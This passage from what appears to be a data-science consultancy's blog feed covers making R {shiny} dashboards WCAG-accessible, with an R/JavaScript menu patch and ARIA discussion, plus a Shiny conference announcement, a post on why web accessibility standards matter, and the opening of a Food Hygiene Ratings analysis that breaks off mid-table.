&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;accessible_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(bad_menu) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tab_input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;function customMenuHandleClick(e) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; let n = $(e.target).parents(&amp;#39;ul.sidebar-menu&amp;#39;).find(&amp;#39;li.active:not(.treeview)&amp;#39;).children(&amp;#39;a&amp;#39;)[0].dataset.value;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; doSomethingWith(n);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;function doSomethingWith(val) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.setInputValue(&amp;#39;sidebarMenu&amp;#39;, val);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;$(document).ready(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; $(&amp;#39;ul.sidebar-menu li&amp;#39;).click(customMenuHandleClick)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bad_menu&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(bad_menu&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; real_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(bad_menu, tab_input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; real_menu
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;accessible_menu&lt;/span&gt;(x)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html&lt;/span&gt;(lang &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;Use or develop a different navigation structure for the app&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="aria--attributes-do-not-match-their-roles"&gt;[aria-*] attributes do not match their roles&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; Each ARIA role supports a specific subset of aria-*
attributes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Users of screen readers and other
assistive technologies need information about the behavior and
purpose of controls on your web page. Built-in HTML controls like
buttons and radio groups come with that information built in. For
custom controls you create, however, you must provide the
information with ARIA roles and attributes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution?:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is caused by the &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tag in the &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; for the menu item.
This is potentially somewhat confusing because the generated HTML
when viewing the output of the relevant R code is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but they are added as part of the JavaScript bundle that is given to
the browser that controls other behaviour of the {shinydashboard}
library. After launching the application it becomes&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt; aria-expanded&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; tabindex&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; aria-selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So we are now at a state where even though we start to patch functions
generating the UI code, things are happening outside of my direct
control which make it extremely difficult to force this package to
comply with WCAG. And we are completely ignoring all the things that
Lighthouse doesn’t pick up on. To name some:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The header section includes an empty list
(&lt;code&gt;&amp;lt;ul class=&amp;quot;nav navbar-nav&amp;quot;&amp;gt;&amp;lt;/ul&amp;gt;&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The “Toggle Navigation” component is correctly labelled, and is
correctly exposed as a button. However, it is missing the
aria-expanded attribute. Each of the navigation menu items is
exposed as a link but, in reality, these are tabs (as they don’t
direct the user to other pages - instead, only the main content
section changes).&lt;/li&gt;
&lt;li&gt;The container for the main content section is unnecessarily
&lt;code&gt;focusable&lt;/code&gt;, as &lt;code&gt;tabindex=&amp;quot;0&amp;quot;&lt;/code&gt; is applied to the related &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;
element (&lt;code&gt;&amp;lt;div id=&amp;quot;shiny-tab-Home&amp;quot; role=&amp;quot;tabpanel&amp;quot; tabindex=&amp;quot;0&amp;quot;&amp;gt;&lt;/code&gt;).
Only functional/operable content should be focusable using the
keyboard.&lt;/li&gt;
&lt;li&gt;Navigation menu content is still readable by screen readers even
when the related content is in a collapsed (visibly hidden) state.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="so-scrap-shiny"&gt;So scrap {shiny}?&lt;/h2&gt;
&lt;p&gt;Is {shiny} a terrible solution when wanting to build an accessible web
app then? Well not necessarily, at the end of the day, all {shiny} does
is wrap front end content in R functions. You can still write R
functions that will generate WCAG compliant HTML. But… and I think it is
quite a big but, making a {shiny} application WCAG compliant requires a
bit more thought and attention, and almost certainly means not using all
your favourite libraries. It was ignored in the previous section but
{DT} and {plotly}, both mentioned as great packages for common {shiny}
app components, also do not give WCAG compliant markup. {plotly} in
particular is very problematic in this arena, still one of my favourite
plotting solutions for R, but not amenable to an accessible application.
In short, you will have to roll your own a bit more.&lt;/p&gt;
&lt;p&gt;There are tools to help you assess your application. Lighthouse in the
browser was used in the above discussion, there are other tools like
Koa11y for generating reports which I find give more info and there is a
{shinya11y} R package which aims to help specifically with {shiny}.
Having said that none of these tools are perfect.&lt;/p&gt;
&lt;h2 id="how-does-this-story-end"&gt;How does this story end?&lt;/h2&gt;
&lt;p&gt;In summary, it is entirely possible to create fully accessible {shiny}
applications, however I think there is a lot of work to be done by
developers of packages for {shiny} to ease the burden somewhat as at
present a lot of my favourite packages leave me with too much hacking to
do to solve the problem. For the particular project referenced in the
opening remarks, the requirement to be WCAG compliant plus some
additional constraints meant that an alternative solution based on
{plumber} and a separate front end was developed. In my initial report I
remarked to the client that a {shiny} solution could be developed and I
maintain that view now, however I am a little bit happy that we opted
for an alternative. I do love {shiny} and will continue to use it a lot,
but it is not the only solution we have available to us and until it
becomes a little easier to create accessible applications with some
complexity to them I can’t strongly recommend it for every application.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production (2022)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-conference/</link><pubDate>Fri, 13 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-conference/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="save-the-date-6th-7th-october"&gt;Save the Date: 6th-7th October&lt;/h3&gt;
&lt;p&gt;This October, Jumping Rivers will be holding our in-person Shiny in Production conference! Hosted in the centre of Newcastle Upon Tyne, UK, this conference will delve into the world of {shiny} and other web based R packages.&lt;/p&gt;
&lt;p&gt;We have an excellent line up of expert speakers for you from a wide range of industries, as well as an afternoon of workshops hosted by our very own Jumping Rivers R pros.&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re a seasoned {shiny} user who wants to network and share knowledge, someone who&amp;rsquo;s just getting started and wants to learn from the experts, or anybody in between, if you&amp;rsquo;re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;p&gt;For more information take a look at our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-conference"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The importance of web accessibility standards</title><link>https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/</link><pubDate>Thu, 12 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/" rel="external"&gt;The importance of web accessibility standards&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;Accessibility in R applications: {shiny}&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An accessible website is more than putting content online. Making a
website accessible means ensuring that it can be used by as many people
as possible. Accessibility standards such as the &lt;a href="https://www.w3.org/WAI/standards-guidelines/wcag/" rel="external"&gt;Web Content
Accessibility Guidelines
(WCAG)&lt;/a&gt; help to
standardise the way in which a website can interact with assistive
technologies. Allowing developers to incorporate instructions into their
web applications which can be interpreted by technologies such as screen
readers helps to maintain a consistent user experience for all.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-importance-accessibility-standards-shiny-web"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="why-should-data-scientists-care"&gt;Why should data scientists care?&lt;/h2&gt;
&lt;p&gt;Data scientists often prepare web based content around data driven
insight. This might be through reports created using technologies like
{rmarkdown}, perhaps GUI front ends to expose model and data APIs built
using {flask} or {plumber}, or applications to facilitate analyses with
{shiny} or {dash}. These outputs are created with the intention of being
used by others, giving capacity to users to derive meaning and value
from data and statistical or mathematical models. My users might be key
stakeholders and decision makers at one of our clients, or indeed the
general public. Maximising the ability for my users to gain the insight
that a solution provides helps to guarantee that, as a company, we are
providing value and an impactful service.&lt;/p&gt;
&lt;p&gt;Certainly, at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, as we
build solutions for a number of public sector organisations,
consideration of accessibility criteria has become an important part of
development standards.&lt;/p&gt;
&lt;h2 id="making-my-site-accessible"&gt;Making my Site Accessible&lt;/h2&gt;
&lt;p&gt;Meeting accessibility requirements has become an increasing area of
focus for many developers. The accessibility regulations came into force
for public sector bodies in the UK in September 2018, expanding upon the
obligations to people who have a disability under the Equality Act. In
the UK alone there are almost 2 million people classed as fully or
partially blind, a further 1.5 million with a learning disability and
another 11 million with some degree of hearing loss. Implementing WCAG,
an approved ISO standard, is an excellent way of making sure that your
website is up to par.&lt;/p&gt;
&lt;h2 id="what-is-wcag"&gt;What is WCAG?&lt;/h2&gt;
&lt;p&gt;WCAG is a technical standard primarily aimed at web developers providing
a set of testable guidelines arranged into 4 categories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perceivable: Content must be detectable to a users senses. This
might mean text alternatives for non-text content that can be read
aloud using a screen reader for people with reading difficulties,
short equivalents for images or descriptions of data represented on
a chart or diagram.&lt;/li&gt;
&lt;li&gt;Operable: Your site is comfortably navigable for users and there
isn’t any part of the site that is inaccessible to someone. Many
people do not use the mouse and rely on the keyboard to interact
with a website. This requires keyboard access to all functionality
and user interface components.&lt;/li&gt;
&lt;li&gt;Understandable: Clarity on how to use and navigate the content,
ensuring that users can process the information presented to them.
This involves things like making text readable and understandable
and making sure content appears in and operates in predictable ways.&lt;/li&gt;
&lt;li&gt;Robust: Robustness covers planning for the evolution of technology
and user changes, making sure that content remains accessible and
comprehensible to users with a range of different disabilities. The
aim is to make your site compatible with different browsers and
assistive technologies, for example, providing names, roles and
values for non-standard user interface components.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="other-benefits-of-accessibility"&gt;Other Benefits of Accessibility&lt;/h2&gt;
&lt;p&gt;Web accessibility can add value beyond making sure that your content is
able to be experienced by all.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;SEO: Many different factors contribute to search engine optimisation
(SEO), including content and user experience. Because search engine
providers want to deliver only the best results to their users,
crawlers are also interested in the user experience of your website
and rank it according to usability. Fixing accessibility issues has
the added benefit of improving SEO.&lt;/li&gt;
&lt;li&gt;Widened audience: Ultimately, people will only use and revisit
websites that they can actually use. By designing your content with
accessibility in mind, making it usable for all, you are not
restricting your site to only those that do not have difficulties
consuming content through a standard browser.&lt;/li&gt;
&lt;li&gt;Enhancing your brand: A clear commitment to accessibility highlights
a genuine sense of corporate social responsibility, helping to
protect and enhance your businesses brand.&lt;/li&gt;
&lt;li&gt;Improved mobile usability: An ever increasing number of site visits
are being made using mobile devices. For accessibility, users should
be able to magnify the screen and retain access to all of the
content. This is similar to browsing on a smaller screen, say a
smartphone.&lt;/li&gt;
&lt;li&gt;Coding standards: Designing for and implementing accessibility from
the off also encourages strict adherence to proper coding practices.
This tends to lead to cleaner, more performant and easier to
maintain code reducing total cost over the lifespan of a website.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The link between Food Hygiene Ratings and Deprivation</title><link>https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/</link><pubDate>Thu, 05 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;If you’ve ever visited any food establishment in England &amp;amp; Wales, you’ve
probably noticed the green labels somewhere on the outside with a Food
Hygiene Rating from 0-5 on it. If you haven’t, then put simply - every
food establishment in England / Wales is required to have a food hygiene
inspection, and on the basis of this inspection is rated on a scale of
0-5, with 5 being “crack on, enjoy your dinner”, and 0 being “hmm, maybe
don’t risk it”. I explored these Food Hygiene Ratings for my Masters’
dissertation with the overarching question:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Are the ratings randomly scattered around the country and if they are
not, what are some of the variables that influence this?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="how-are-food-hygiene-ratings-calculated"&gt;How are Food Hygiene Ratings calculated?&lt;/h2&gt;
&lt;p&gt;So, how do the inspectors quantify an inspection and how are Food
Hygiene Ratings calculated? During an inspection, the establishment is
marked on three criteria:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Hygiene&lt;/strong&gt;: how well the food is being stored, prepared and cooked;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Structural&lt;/strong&gt;: the layout of the premises - inspectors are looking
for cleanliness, ventilation and pest control; and&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Management&lt;/strong&gt;: the standard of the paperwork and training - how
confident the inspectors are that the standards seen will be
maintained after the inspection.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;They are then given a score in each of the three categories. These
scores are added together to produce an &lt;em&gt;Overall Score&lt;/em&gt;, which is then
mapped to a Food Hygiene Rating.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-scores-on-the-doors-analysis"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-data"&gt;The Data&lt;/h2&gt;
&lt;p&gt;To answer the first half of our question, we need to know the scores for
all of the food establishments in the country. Thankfully, the &lt;a href="https://www.food.gov.uk/" rel="external"&gt;Food
Standards Agency&lt;/a&gt;, the organisation which
oversees the inspections, maintains an up-to-date database which
contains all the information required. They even have a section of their
website dedicated to helping users call
&lt;a href="https://api.ratings.food.gov.uk/help" rel="external"&gt;API’s&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For the second half of our question, we decided to investigate whether
the Food Hygiene Ratings vary depending on how deprived an area is.
Deprivation data is available for all four nations of the UK (England,
Northern Ireland, Scotland and Wales) but each country compiles its own.
This means that the data is not comparable - the most deprived local
area in England is not necessarily equivalent to the most deprived local
area in Wales. As a result of this, we only used establishments in
England in the project.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Reproducible - shown at the bottom&lt;/em&gt;.&lt;/p&gt;
&lt;h2 id="data-exploration"&gt;Data Exploration&lt;/h2&gt;
&lt;p&gt;Let’s start by taking a look at how many establishments have each
rating:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/index_files/figure-commonmark/counts-1.svg" title="Number of eating establishments per rating." alt="Number of eating establishments per rating." width="533.333333333333" style="width:500px" class="image-center" /&gt;
&lt;p&gt;Around ~75% of establishments obtain a rating of 5. This is great for
dinner, but not so great for data analysis, as there isn’t much to
differentiate between establishments. It might also be helpful to know
the different types of establishments, and how many there are in each
category:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th style="text-align: left;"&gt;Type of Establishment&lt;/th&gt;
&lt;th style="text-align: right;"&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Restaurant/Cafe/Canteen&lt;/td&gt;
&lt;td style="text-align: right;"&gt;94494&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Retailers - other&lt;/td&gt;
&lt;td style="text-align: right;"&gt;68864&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Takeaway/sandwich shop&lt;/td&gt;
